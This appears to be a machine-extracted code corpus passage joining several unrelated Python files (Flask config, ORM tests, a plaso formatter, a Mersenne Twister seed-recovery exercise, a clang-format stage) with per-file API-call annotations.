'get_grouped_tokens', (['expression'], {}), '(expression)\n', (959, 971), False, 'from tokenizer import get_grouped_tokens, TokenName\n'), ((3741, 3876), 'click.ClickException', 'click.ClickException', (['f"""{expression} is a bad expression. Currently not supporting unix style multiple dots (such as .. etc)"""'], {}), "(\n f'{expression} is a bad expression. Currently not supporting unix style multiple dots (such as .. etc)'\n )\n", (3761, 3876), False, 'import click\n'), ((4910, 5006), 'click.ClickException', 'click.ClickException', (['f"""{t.value} is a bad value where a numeric index of >= 0 is expected"""'], {}), "(\n f'{t.value} is a bad value where a numeric index of >= 0 is expected')\n", (4930, 5006), False, 'import click\n'), ((526, 572), 'click.Group.get_command', 'click.Group.get_command', (['self', 'ctx', 'matches[0]'], {}), '(self, ctx, matches[0])\n', (549, 572), False, 'import click\n'), ((4000, 4137), 'click.ClickException', 'click.ClickException', (['f"""{message} is a bad token. Currently supports either plain key or key with one index (in case of array)"""'], {}), "(\n f'{message} is a bad token. Currently supports either plain key or key with one index (in case of array)'\n )\n", (4020, 4137), False, 'import click\n'), ((4314, 4451), 'click.ClickException', 'click.ClickException', (['f"""{message} is a bad token. Currently supports either plain key or key with one index (in case of array)"""'], {}), "(\n f'{message} is a bad token. Currently supports either plain key or key with one index (in case of array)'\n )\n", (4334, 4451), False, 'import click\n'), ((4538, 4675), 'click.ClickException', 'click.ClickException', (['f"""{message} is a bad token. Currently supports either plain key or key with one index (in case of array)"""'], {}), "(\n f'{message} is a bad token. Currently supports either plain key or key with one index (in case of array)'\n )\n", (4558, 4675), False, 'import click\n')] |
import os
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
MAIN_DB_URL = os.path.join(BASE_DIR, 'bucketlist.sqlite')
TEST_DB_URL = os.path.join(BASE_DIR, 'test.sqlite')
class BaseConfig(object):
'''
The class holds base config for each environment
'''
SECRET_KEY = os.getenv('SECRET_KEY', 'This should be changed')
    SQLALCHEMY_DATABASE_URI = os.getenv(
        'DATABASE_URI', 'sqlite:///' + MAIN_DB_URL)
SQLALCHEMY_TRACK_MODIFICATIONS = False
ERROR_404_HELP = False
DEBUG = False
TESTING = False
class DevelopmentConfig(BaseConfig):
'''
configuration for the development environment
'''
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + MAIN_DB_URL
DEBUG = True
DEVELOPMENT = True
class TestingConfig(BaseConfig):
'''
config when testing
'''
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + TEST_DB_URL
CSRF_ENABLED = False
class StagingConfig(BaseConfig):
DEVELOPMENT = True
DEBUG = True
class ProductionConfig(BaseConfig):
'''
config for when in production
'''
DEBUG = False
| [
"os.path.dirname",
"os.path.join",
"os.getenv"
] | [((79, 122), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""bucketlist.sqlite"""'], {}), "(BASE_DIR, 'bucketlist.sqlite')\n", (91, 122), False, 'import os\n'), ((137, 174), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""test.sqlite"""'], {}), "(BASE_DIR, 'test.sqlite')\n", (149, 174), False, 'import os\n'), ((38, 63), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (53, 63), False, 'import os\n'), ((289, 338), 'os.getenv', 'os.getenv', (['"""SECRET_KEY"""', '"""This should be changed"""'], {}), "('SECRET_KEY', 'This should be changed')\n", (298, 338), False, 'import os\n')] |
import datetime
import os
from typing import List, Optional
import unittest
from parentopticon.db import test_utilities
from parentopticon.db.model import ColumnInteger, ColumnText, Model
class ModelTests(test_utilities.DBTestCase):
"Test all of our logic around the model class."
class MyTable(Model):
COLUMNS = {
"id": ColumnInteger(autoincrement=True, primary_key=True),
"count": ColumnInteger(),
"name": ColumnText(null=True),
}
def _makerows(self, names: Optional[List[str]] = None):
"Make a few rows. Useful for many tests."
names = names or ["foo", "bar", "baz"]
return {
ModelTests.MyTable.insert(self.db, count=(i+1)*2, name=name)
for i, name in enumerate(names)
}
def setUp(self):
super().setUp()
self.db.execute_commit_return(ModelTests.MyTable.create_statement())
self.db.execute_commit_return(ModelTests.MyTable.truncate_statement())
def test_create_statement(self):
"Can we get a proper create table clause?"
result = ModelTests.MyTable.create_statement()
expected = "\n".join((
"CREATE TABLE IF NOT EXISTS MyTable (",
"count INTEGER,",
"id INTEGER PRIMARY KEY AUTOINCREMENT,",
"name TEXT",
");",
))
self.assertEqual(result, expected)
def test_insert(self):
"Can we insert a row into a table?"
rowid = ModelTests.MyTable.insert(self.db, count=3, name="foobar")
found = self.db.execute("SELECT count, name FROM MyTable").fetchall()
self.assertEqual(len(found), 1)
def test_get(self):
"Can we get a row from the table?"
rowid = ModelTests.MyTable.insert(self.db, count=3, name="foobar")
result = ModelTests.MyTable.get(self.db, rowid)
self.assertEqual(result.id, rowid)
self.assertEqual(result.count, 3)
self.assertEqual(result.name, "foobar")
def test_get_none(self):
"Can we get None when the row does not exist?"
result = ModelTests.MyTable.get(self.db, -1)
self.assertIs(result, None)
def test_list_all(self):
"Can we get several rows from the table?"
rowids = self._makerows()
results = ModelTests.MyTable.list(self.db)
self.assertEqual({result.id for result in results}, rowids)
def test_list_some(self):
"Can we get several rows from the table with a where clause?"
rowids = self._makerows()
results = ModelTests.MyTable.list_where(self.db, where="count >= 4")
self.assertEqual({result.count for result in results}, {4, 6})
def test_list_with_none(self):
"Can we get a list where an item is NULL?"
rowids = self._makerows(names=["foo", None, "bar"])
results = ModelTests.MyTable.list(self.db, name=None)
self.assertEqual({result.count for result in results}, {4})
def test_search_not_found(self):
"Can we search and not find something?"
results = ModelTests.MyTable.search(self.db, name="sir-not-appearing")
self.assertIs(results, None)
def test_search_one(self):
"Can we search and find a single row?"
rowids = self._makerows()
results = ModelTests.MyTable.search(self.db, name="foo")
self.assertEqual(results.name, "foo")
self.assertEqual(results.count, 2)
def test_search_many(self):
"Do we error when we have multiple matches?"
self._makerows(names=["foo", "foo", "bar"])
with self.assertRaises(ValueError):
ModelTests.MyTable.search(self.db, name="foo")
def test_search_with_none(self):
"Do we properly search for NULL columns?"
self._makerows(names=["foo", None, "bar"])
results = ModelTests.MyTable.search(self.db, name=None)
self.assertEqual(results.name, None)
self.assertEqual(results.count, 4)
def test_update(self):
"Can we update a row with update()?"
rows = self._makerows(names=["foo"])
row_id = list(rows)[0]
ModelTests.MyTable.update(self.db, row_id, name="biff")
results = ModelTests.MyTable.get(self.db, row_id)
self.assertEqual(results.name, "biff")
def test_update_multiple(self):
"Can we update a row with multiple values?"
rows = self._makerows(names=["foo"])
row_id = list(rows)[0]
ModelTests.MyTable.update(self.db, row_id, name="biff", count=100)
results = ModelTests.MyTable.get(self.db, row_id)
self.assertEqual(results.count, 100)
self.assertEqual(results.name, "biff")
| [
"parentopticon.db.model.ColumnText",
"parentopticon.db.model.ColumnInteger"
] | [((330, 381), 'parentopticon.db.model.ColumnInteger', 'ColumnInteger', ([], {'autoincrement': '(True)', 'primary_key': '(True)'}), '(autoincrement=True, primary_key=True)\n', (343, 381), False, 'from parentopticon.db.model import ColumnInteger, ColumnText, Model\n'), ((395, 410), 'parentopticon.db.model.ColumnInteger', 'ColumnInteger', ([], {}), '()\n', (408, 410), False, 'from parentopticon.db.model import ColumnInteger, ColumnText, Model\n'), ((423, 444), 'parentopticon.db.model.ColumnText', 'ColumnText', ([], {'null': '(True)'}), '(null=True)\n', (433, 444), False, 'from parentopticon.db.model import ColumnInteger, ColumnText, Model\n')] |
# -*- coding: utf-8 -*-
"""The UTMPX binary file event formatter."""
from plaso.formatters import interface
from plaso.formatters import manager
from plaso.lib import errors
class UtmpxSessionFormatter(interface.ConditionalEventFormatter):
"""Formatter for an UTMPX session event."""
DATA_TYPE = u'mac:utmpx:event'
FORMAT_STRING_PIECES = [
u'User: {user}',
u'Status: {status}',
u'Computer Name: {computer_name}',
u'Terminal: {terminal}']
FORMAT_STRING_SHORT_PIECES = [u'User: {user}']
SOURCE_LONG = u'UTMPX session'
SOURCE_SHORT = u'LOG'
# 9, 10 and 11 are only for Darwin and IOS.
_STATUS_TYPES = {
0: u'EMPTY',
1: u'RUN_LVL',
2: u'BOOT_TIME',
3: u'OLD_TIME',
4: u'NEW_TIME',
5: u'INIT_PROCESS',
6: u'LOGIN_PROCESS',
7: u'USER_PROCESS',
8: u'DEAD_PROCESS',
9: u'ACCOUNTING',
10: u'SIGNATURE',
11: u'SHUTDOWN_TIME'}
def GetMessages(self, unused_formatter_mediator, event_object):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator: the formatter mediator object (instance of
FormatterMediator).
event_object: the event object (instance of EventObject).
Returns:
A tuple containing the formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event_object.data_type:
raise errors.WrongFormatter(u'Unsupported data type: {0:s}.'.format(
event_object.data_type))
event_values = event_object.GetValues()
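    # Map the numeric status type to its symbolic name, falling back to the raw number.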
status_type = event_values.get(u'status_type', None)
if status_type is not None:
event_values[u'status'] = self._STATUS_TYPES.get(
status_type, u'{0:d}'.format(status_type))
else:
event_values[u'status'] = u'N/A'
return self._ConditionalFormatMessages(event_values)
manager.FormattersManager.RegisterFormatter(UtmpxSessionFormatter)
| [
"plaso.formatters.manager.FormattersManager.RegisterFormatter"
] | [((1969, 2035), 'plaso.formatters.manager.FormattersManager.RegisterFormatter', 'manager.FormattersManager.RegisterFormatter', (['UtmpxSessionFormatter'], {}), '(UtmpxSessionFormatter)\n', (2012, 2035), False, 'from plaso.formatters import manager\n')] |
import pytest
import numpy as np
from sklearn.datasets import load_iris
from numpy.testing import assert_array_equal
from numpy.testing import assert_allclose
from .._kdclassifier import KDClassifierRF
from .._RBFSamplerORF import RBFSamplerORF
from .._RBFSamplerSORF import RBFSamplerSORF
@pytest.fixture
def data():
return load_iris(return_X_y=True)
def test_KDClassifierRF(data):
X, y = data
clf = KDClassifierRF()
assert hasattr(clf, 'approx')
assert hasattr(clf, 'normalize')
assert hasattr(clf, 'gamma')
assert hasattr(clf, 'n_components')
for approx in ['rff+','rff', 'lrff', 'lrff+', 'exact']:
clf = KDClassifierRF(approx=approx)
clf.fit(X, y)
assert hasattr(clf, 'classes_')
assert hasattr(clf, 'Xtrain_')
if clf.approx != 'exact':
assert hasattr(clf, 'rbf_sampler_')
y_pred = clf.predict(X)
assert y_pred.shape == (X.shape[0],)
def test_KDClassifierORF(data):
X, y = data
for approx in ['rff+','rff', 'lrff', 'lrff+', 'exact']:
clf = KDClassifierRF(approx=approx, sampler=RBFSamplerORF())
clf.fit(X, y)
assert hasattr(clf, 'classes_')
assert hasattr(clf, 'Xtrain_')
if clf.approx != 'exact':
assert hasattr(clf, 'rbf_sampler_')
y_pred = clf.predict(X)
assert y_pred.shape == (X.shape[0],)
def test_KDClassifierSORF(data):
X, y = data
for approx in ['rff+','rff', 'lrff', 'lrff+', 'exact']:
clf = KDClassifierRF(approx=approx, sampler=RBFSamplerSORF())
clf.fit(X, y)
assert hasattr(clf, 'classes_')
assert hasattr(clf, 'Xtrain_')
if clf.approx != 'exact':
assert hasattr(clf, 'rbf_sampler_')
y_pred = clf.predict(X)
assert y_pred.shape == (X.shape[0],)
| [
"sklearn.datasets.load_iris"
] | [((333, 359), 'sklearn.datasets.load_iris', 'load_iris', ([], {'return_X_y': '(True)'}), '(return_X_y=True)\n', (342, 359), False, 'from sklearn.datasets import load_iris\n')] |
from itertools import cycle, islice
import re
distances = {}
for line in open('input.txt'):
m = re.match(r'(\w+) can fly (\d+) km/s for (\d+) seconds, '
r'but then must rest for (\d+) seconds.', line)
reindeer, speed, time, rest = m.groups()
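    # Per-second distances repeat forever: `speed` km for `time` seconds, then 0 km while resting.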
distances[reindeer] = cycle([int(speed)] * int(time) + [0] * int(rest))
print(max(sum(islice(seconds, 0, 2503)) for seconds in distances.values()))
| [
"re.match",
"itertools.islice"
] | [((102, 215), 're.match', 're.match', (['"""(\\\\w+) can fly (\\\\d+) km/s for (\\\\d+) seconds, but then must rest for (\\\\d+) seconds."""', 'line'], {}), "(\n '(\\\\w+) can fly (\\\\d+) km/s for (\\\\d+) seconds, but then must rest for (\\\\d+) seconds.'\n , line)\n", (110, 215), False, 'import re\n'), ((360, 384), 'itertools.islice', 'islice', (['seconds', '(0)', '(2503)'], {}), '(seconds, 0, 2503)\n', (366, 384), False, 'from itertools import cycle, islice\n')] |
import datetime as dt
import pandas
import random
import smtplib
MY_EMAIL = "your_email"
PASSWORD = "<PASSWORD>"
today = dt.datetime.now()
today_tuple = (today.month, today.day)
data = pandas.read_csv("birthdays.csv")
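# Index each row by its (month, day) so today's date can be looked up directly.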
birthday_dict = {(data_row.month, data_row.day): data_row for (index, data_row) in data.iterrows()}
if today_tuple in birthday_dict:
birthday_person = birthday_dict[today_tuple]
file_path = f"letter_templates/letter_{random.randint(1, 3)}.txt"
with open(file_path) as letter:
contents = letter.read()
contents = contents.replace("[NAME]", birthday_person["name"])
with smtplib.SMTP_SSL("smtp.gmail.com") as connection:
connection.login(MY_EMAIL, PASSWORD)
connection.sendmail(from_addr=MY_EMAIL, to_addrs=birthday_person["email"], msg=f"Subject: Happy Birthday! \n\n"
f"{contents}") | [
"pandas.read_csv",
"smtplib.SMTP_SSL",
"datetime.datetime.now",
"random.randint"
] | [((149, 166), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (164, 166), True, 'import datetime as dt\n'), ((214, 246), 'pandas.read_csv', 'pandas.read_csv', (['"""birthdays.csv"""'], {}), "('birthdays.csv')\n", (229, 246), False, 'import pandas\n'), ((651, 685), 'smtplib.SMTP_SSL', 'smtplib.SMTP_SSL', (['"""smtp.gmail.com"""'], {}), "('smtp.gmail.com')\n", (667, 685), False, 'import smtplib\n'), ((474, 494), 'random.randint', 'random.randint', (['(1)', '(3)'], {}), '(1, 3)\n', (488, 494), False, 'import random\n')] |
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
import warnings
from math import exp
import numpy as np
def fit_factory(discard=1):
def fit(x, y):
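        # With the default discard=1: fit a line, drop the point with the largest absolute residual, then refit.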
p = np.polyfit(x, y, 1)
v = np.polyval(p, x)
e = np.abs(y - v)
drop_idxs = np.argsort(e)[-discard]
return np.polyfit(np.delete(x, drop_idxs),
np.delete(y, drop_idxs), 1)
return fit
def integrate_tolerance_series(odesys, atols, rtols, x, y0, params=(),
fit=lambda x, y: np.polyfit(x, y, 1), val=np.polyval, **kwargs):
"""
Parameters
----------
odesys : :class:`ODESys`
atols : array_like
Positive, monotonically increasing 1D array.
rtols : array_like
Positive, monotonically increasing 1D array.
x : array_like
Passed on to ``odesys.integrate`` for first set of tolerances.
(subsequent calls will use xout from first integration).
y0 : array_like
Passed on to ``odesys.integrate``.
params : array_like
Passed on to ``odesys.integrate``.
    fit : callable
        Fits the log-log relation between differences and tolerances (default: 1st degree ``np.polyfit``).
    val : callable
        Evaluates the fitted relation (default: ``np.polyval``).
\\*\\*kwargs:
Passed on to ``odesys.integrate``.
Returns
-------
result0 : Result
results : list of Result instances
extra : dict
errest : 2D array of error estimates for result0.yout
"""
if atols is None:
atols = rtols
if rtols is None:
rtols = atols
atols, rtols = map(np.asarray, (atols, rtols))
if atols.ndim != 1:
raise NotImplementedError("Assuming 1-dimensional array")
if atols.shape != rtols.shape:
raise ValueError("atols & rtols need to be of same length")
if 'atol' in kwargs or 'rtol' in kwargs:
raise ValueError("Neither atol nor rtol are allowed in kwargs")
if not np.all(atols > 0) or not np.all(rtols > 0):
raise ValueError("atols & rtols need to > 0")
if not np.all(np.diff(atols) > 0) or not np.all(np.diff(rtols) > 0):
raise ValueError("atols & rtols need to obey strict positive monotonicity")
if atols.size < 4:
raise ValueError("Pointless doing linear interpolation on less than 3 points")
if atols.size < 6:
warnings.warn("Statistics will be (very) shaky when doing linear "
"interpolation on less than 5 points.")
ntols = atols.size
result0 = odesys.integrate(x, y0, params, atol=atols[0], rtol=rtols[0], **kwargs)
results = [odesys.integrate(result0.xout, y0, params, atol=atols[i], rtol=rtols[i], **kwargs)
for i in range(1, ntols)]
errest = []
for ix, vx in enumerate(result0.xout):
diffs = np.array([result0.yout[ix, :] - r.yout[ix, :] for r in results])
tols = np.array([atol + rtol*np.abs(r.yout[ix, :]) for r, atol, rtol in
zip([result0] + results, atols, rtols)])
ln_tols = np.log(tols).astype(np.float64)
ln_absd = np.log(np.abs(diffs)).astype(np.float64)
yerrs = []
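        # For each component, fit log(|difference between runs|) against log(tolerance) and
        # extrapolate down to the strictest tolerance to estimate the error in result0.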
for iy in range(result0.yout.shape[-1]):
if np.all(diffs[:, iy] == 0):
yerrs.append(0)
else:
p = fit(ln_tols[1:, iy], ln_absd[:, iy])
yerrs.append(exp(val(p, ln_tols[0, iy])))
errest.append(yerrs)
return result0, results, {'errest': np.array(errest)}
| [
"numpy.abs",
"numpy.log",
"numpy.polyfit",
"numpy.polyval",
"numpy.argsort",
"numpy.diff",
"numpy.array",
"warnings.warn",
"numpy.delete",
"numpy.all"
] | [((210, 229), 'numpy.polyfit', 'np.polyfit', (['x', 'y', '(1)'], {}), '(x, y, 1)\n', (220, 229), True, 'import numpy as np\n'), ((242, 258), 'numpy.polyval', 'np.polyval', (['p', 'x'], {}), '(p, x)\n', (252, 258), True, 'import numpy as np\n'), ((271, 284), 'numpy.abs', 'np.abs', (['(y - v)'], {}), '(y - v)\n', (277, 284), True, 'import numpy as np\n'), ((570, 589), 'numpy.polyfit', 'np.polyfit', (['x', 'y', '(1)'], {}), '(x, y, 1)\n', (580, 589), True, 'import numpy as np\n'), ((2252, 2365), 'warnings.warn', 'warnings.warn', (['"""Statistics will be (very) shaky when doing linear interpolation on less than 5 points."""'], {}), "(\n 'Statistics will be (very) shaky when doing linear interpolation on less than 5 points.'\n )\n", (2265, 2365), False, 'import warnings\n'), ((2704, 2770), 'numpy.array', 'np.array', (['[(result0.yout[ix, :] - r.yout[ix, :]) for r in results]'], {}), '([(result0.yout[ix, :] - r.yout[ix, :]) for r in results])\n', (2712, 2770), True, 'import numpy as np\n'), ((305, 318), 'numpy.argsort', 'np.argsort', (['e'], {}), '(e)\n', (315, 318), True, 'import numpy as np\n'), ((355, 378), 'numpy.delete', 'np.delete', (['x', 'drop_idxs'], {}), '(x, drop_idxs)\n', (364, 378), True, 'import numpy as np\n'), ((406, 429), 'numpy.delete', 'np.delete', (['y', 'drop_idxs'], {}), '(y, drop_idxs)\n', (415, 429), True, 'import numpy as np\n'), ((1856, 1873), 'numpy.all', 'np.all', (['(atols > 0)'], {}), '(atols > 0)\n', (1862, 1873), True, 'import numpy as np\n'), ((1881, 1898), 'numpy.all', 'np.all', (['(rtols > 0)'], {}), '(rtols > 0)\n', (1887, 1898), True, 'import numpy as np\n'), ((3107, 3132), 'numpy.all', 'np.all', (['(diffs[:, iy] == 0)'], {}), '(diffs[:, iy] == 0)\n', (3113, 3132), True, 'import numpy as np\n'), ((3368, 3384), 'numpy.array', 'np.array', (['errest'], {}), '(errest)\n', (3376, 3384), True, 'import numpy as np\n'), ((2933, 2945), 'numpy.log', 'np.log', (['tols'], {}), '(tols)\n', (2939, 2945), True, 'import numpy as np\n'), ((1972, 1986), 'numpy.diff', 'np.diff', (['atols'], {}), '(atols)\n', (1979, 1986), True, 'import numpy as np\n'), ((2006, 2020), 'numpy.diff', 'np.diff', (['rtols'], {}), '(rtols)\n', (2013, 2020), True, 'import numpy as np\n'), ((2990, 3003), 'numpy.abs', 'np.abs', (['diffs'], {}), '(diffs)\n', (2996, 3003), True, 'import numpy as np\n'), ((2806, 2827), 'numpy.abs', 'np.abs', (['r.yout[ix, :]'], {}), '(r.yout[ix, :])\n', (2812, 2827), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Learn more: https://github.com/kennethreitz/setup.py
import os, sys
from setuptools import setup, find_packages
from typing import List
def read_requirements() -> List:
"""Parse requirements from requirements.txt."""
reqs_path = os.path.join('.', 'requirements.txt')
with open(reqs_path, 'r') as f:
requirements = [line.rstrip() for line in f]
return requirements
# Assumed layout: README.rst and LICENSE sit next to setup.py and provide the
# long_description and license text used below.
with open('README.rst') as f:
    readme = f.read()
with open('LICENSE') as f:
    license = f.read()
setup(
name='sample',
version='0.1.0',
description='Sample package for Python-Guide.org',
long_description=readme,
author='<NAME>',
author_email='<EMAIL>',
install_requires=read_requirements(),
url='test',
license=license,
packages=find_packages(exclude=('tests', 'docs'))
)
| [
"os.path.join",
"setuptools.find_packages"
] | [((242, 279), 'os.path.join', 'os.path.join', (['"""."""', '"""requirements.txt"""'], {}), "('.', 'requirements.txt')\n", (254, 279), False, 'import os, sys\n'), ((667, 707), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "('tests', 'docs')"}), "(exclude=('tests', 'docs'))\n", (680, 707), False, 'from setuptools import setup, find_packages\n')] |
from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel
IMAGE1 = {
"Annotations": {"key1": "value1"},
"Architecture": "amd64",
"Digest": "sha256:baabaa",
"Labels": {"key2": "value2"},
"MediaType": "application/vnd.docker.distribution.manifest.v2+json",
"OS": "linux",
"Tags": ["tag1"],
'PullSpec': 'candidate-registry.fedoraproject.org/baobab@sha256:12345'
}
IMAGE2 = {
"Annotations": {"key1": "value1"},
"Architecture": "ppc64le",
"Digest": "sha256:beebee",
"Labels": {"key2": "value2"},
"MediaType": "application/vnd.docker.distribution.manifest.v2+json",
"OS": "linux",
"Tags": ["tag2"]
}
LIST1 = {
"Digest": "sha256:booboo",
"MediaType": "application/vnd.docker.distribution.manifest.list.v2+json",
"Images": [IMAGE1, IMAGE2],
"Tags": ["latest"],
}
REGISTRY = {
"Repositories": [
{
"Name": "aisleriot",
"Images": [
IMAGE1,
IMAGE2,
],
"Lists": [
LIST1
],
}
]
}
IMAGE_BUILD = {
'BuildId': 12345,
'Nvr': 'testrepo-1.2.3-1',
'Source': 'git://src.fedoraproject.org/flatpaks/baobab#BAOBAB_GIT_DIGEST',
'CompletionTime': '2020-07-31T16:26:22+00:00',
'UserName': 'jdoe',
'Images': [IMAGE1]
}
FLATPAK_BUILD = {
'BuildId': 12345,
'Nvr': 'testrepo-1.2.3-1',
'Source': 'git://src.fedoraproject.org/flatpaks/baobab#BAOBAB_GIT_DIGEST',
'CompletionTime': '2020-07-31T16:26:22+00:00',
'UserName': 'jdoe',
'Images': [IMAGE1],
'ModuleBuilds': ['baobab-1.2.3-3020190603102507'],
'PackageBuilds': ['baobab-1.2.3-1'],
}
def test_registry_model():
model = RegistryModel.from_json(REGISTRY)
json = model.to_json()
assert json == REGISTRY
def test_registry_model_add_image():
model = RegistryModel.from_json(REGISTRY)
image = ImageModel.from_json(IMAGE1)
model.add_image('aisleriot2', image)
assert model.repositories['aisleriot2'].images[image.digest] == image
def test_image_build_repository():
image = ImageBuildModel.from_json(IMAGE_BUILD)
assert image.repository == 'baobab'
def test_image_build_from_json():
image = ImageBuildModel.from_json(IMAGE_BUILD)
assert isinstance(image, ImageBuildModel)
flatpak = ImageBuildModel.from_json(FLATPAK_BUILD)
assert isinstance(flatpak, FlatpakBuildModel)
| [
"flatpak_indexer.models.ImageBuildModel.from_json",
"flatpak_indexer.models.RegistryModel.from_json",
"flatpak_indexer.models.ImageModel.from_json"
] | [((1756, 1789), 'flatpak_indexer.models.RegistryModel.from_json', 'RegistryModel.from_json', (['REGISTRY'], {}), '(REGISTRY)\n', (1779, 1789), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n'), ((1897, 1930), 'flatpak_indexer.models.RegistryModel.from_json', 'RegistryModel.from_json', (['REGISTRY'], {}), '(REGISTRY)\n', (1920, 1930), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n'), ((1944, 1972), 'flatpak_indexer.models.ImageModel.from_json', 'ImageModel.from_json', (['IMAGE1'], {}), '(IMAGE1)\n', (1964, 1972), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n'), ((2138, 2176), 'flatpak_indexer.models.ImageBuildModel.from_json', 'ImageBuildModel.from_json', (['IMAGE_BUILD'], {}), '(IMAGE_BUILD)\n', (2163, 2176), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n'), ((2265, 2303), 'flatpak_indexer.models.ImageBuildModel.from_json', 'ImageBuildModel.from_json', (['IMAGE_BUILD'], {}), '(IMAGE_BUILD)\n', (2290, 2303), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n'), ((2365, 2405), 'flatpak_indexer.models.ImageBuildModel.from_json', 'ImageBuildModel.from_json', (['FLATPAK_BUILD'], {}), '(FLATPAK_BUILD)\n', (2390, 2405), False, 'from flatpak_indexer.models import FlatpakBuildModel, ImageModel, ImageBuildModel, RegistryModel\n')] |
import time
import random
from MT19937 import seed_mt
from MT19937 import extract_number
def delay(seconds):  # delay() can be interrupted with Ctrl+C, whereas time.sleep() cannot
start = time.time()
while time.time() - start < seconds:
pass
def main():
start_time = time.time()
print('Pending...')
delay(random.randint(40,1000))
timestamp = int(time.time())
seed_mt(timestamp)
rand = extract_number()
delay(random.randint(40,1000))
print('\nFirst output of the RNG: ' + str(rand))
print('\nNow I will try to discover the seed the program has taken')
print('given the fact that I know it used MT19937!')
print('\nNow cracking...')
test = int(time.time())
seed_mt(test)
first = extract_number()
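    # Brute force: step the candidate timestamp backwards, reseeding MT19937 each time,
    # until the generator reproduces the observed first output.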
while first != rand:
test -= 1
seed_mt(test)
first = extract_number()
print('Haha, the time seed is ' + str(test) + ', isn\'t it?')
if test == timestamp:
print('Congratulation! You have broken my super-insecure randomness using timestamp!')
else:
print('Huh? That\'s all you have? The real timestamp is ' + str(timestamp))
print('Poor you.')
time_elapsed = time.time() - start_time
print('Time elapsed: ' + str(time_elapsed))
if __name__ == '__main__':
main()
| [
"MT19937.extract_number",
"random.randint",
"MT19937.seed_mt",
"time.time"
] | [((185, 196), 'time.time', 'time.time', ([], {}), '()\n', (194, 196), False, 'import time\n'), ((286, 297), 'time.time', 'time.time', ([], {}), '()\n', (295, 297), False, 'import time\n'), ((400, 418), 'MT19937.seed_mt', 'seed_mt', (['timestamp'], {}), '(timestamp)\n', (407, 418), False, 'from MT19937 import seed_mt\n'), ((431, 447), 'MT19937.extract_number', 'extract_number', ([], {}), '()\n', (445, 447), False, 'from MT19937 import extract_number\n'), ((741, 754), 'MT19937.seed_mt', 'seed_mt', (['test'], {}), '(test)\n', (748, 754), False, 'from MT19937 import seed_mt\n'), ((768, 784), 'MT19937.extract_number', 'extract_number', ([], {}), '()\n', (782, 784), False, 'from MT19937 import extract_number\n'), ((336, 360), 'random.randint', 'random.randint', (['(40)', '(1000)'], {}), '(40, 1000)\n', (350, 360), False, 'import random\n'), ((382, 393), 'time.time', 'time.time', ([], {}), '()\n', (391, 393), False, 'import time\n'), ((459, 483), 'random.randint', 'random.randint', (['(40)', '(1000)'], {}), '(40, 1000)\n', (473, 483), False, 'import random\n'), ((723, 734), 'time.time', 'time.time', ([], {}), '()\n', (732, 734), False, 'import time\n'), ((839, 852), 'MT19937.seed_mt', 'seed_mt', (['test'], {}), '(test)\n', (846, 852), False, 'from MT19937 import seed_mt\n'), ((870, 886), 'MT19937.extract_number', 'extract_number', ([], {}), '()\n', (884, 886), False, 'from MT19937 import extract_number\n'), ((1231, 1242), 'time.time', 'time.time', ([], {}), '()\n', (1240, 1242), False, 'import time\n'), ((208, 219), 'time.time', 'time.time', ([], {}), '()\n', (217, 219), False, 'import time\n')] |
from praline.client.project.pipeline.stage_resources import StageResources
from praline.client.project.pipeline.stages.stage import stage
from praline.client.repository.remote_proxy import RemoteProxy
from praline.common.file_system import FileSystem, join
from typing import Any, Dict
clang_format_style_file_contents = """\
Language: Cpp
AccessModifierOffset: -4
AlignTrailingComments: true
AllowShortBlocksOnASingleLine: false
AllowShortFunctionsOnASingleLine: None
AlwaysBreakTemplateDeclarations: true
BreakBeforeBraces: Allman
ColumnLimit: 120
ConstructorInitializerAllOnOneLineOrOnePerLine: true
FixNamespaceComments: false
IndentWidth: 4
PointerAlignment: Left
ReflowComments: true
SortIncludes: true
SortUsingDeclarations: true
SpaceAfterTemplateKeyword: false
SpacesInAngles: false
UseTab: Never
"""
class ClangFormatConfigurationError(Exception):
pass
def predicate(file_system: FileSystem, program_arguments: Dict[str, Any], configuration: Dict[str, Any]):
return not program_arguments['global']['skip_formatting']
@stage(requirements=[['project_directory']],
output=['clang_format_style_file', 'clang_format_executable'],
predicate=predicate)
def load_clang_format(file_system: FileSystem, resources: StageResources, cache: Dict[str, Any], program_arguments: Dict[str, Any], configuration: Dict[str, Any], remote_proxy: RemoteProxy):
if 'clang-format-executable-path' in configuration:
clang_format_executable = configuration['clang-format-executable-path']
if not file_system.is_file(clang_format_executable):
raise ClangFormatConfigurationError(f"user supplied clang-format '{clang_format_executable}' is not a file")
else:
clang_format_executable = file_system.which('clang-format')
if clang_format_executable is None:
            raise ClangFormatConfigurationError("couldn't find clang-format in path -- either supply it in the praline-client.config file or add it to the path environment variable")
project_directory = resources['project_directory']
resources['clang_format_executable'] = clang_format_executable
resources['clang_format_style_file'] = clang_format_style_file = join(project_directory, '.clang-format')
file_system.create_file_if_missing(clang_format_style_file, clang_format_style_file_contents)
| [
"praline.common.file_system.join",
"praline.client.project.pipeline.stages.stage.stage"
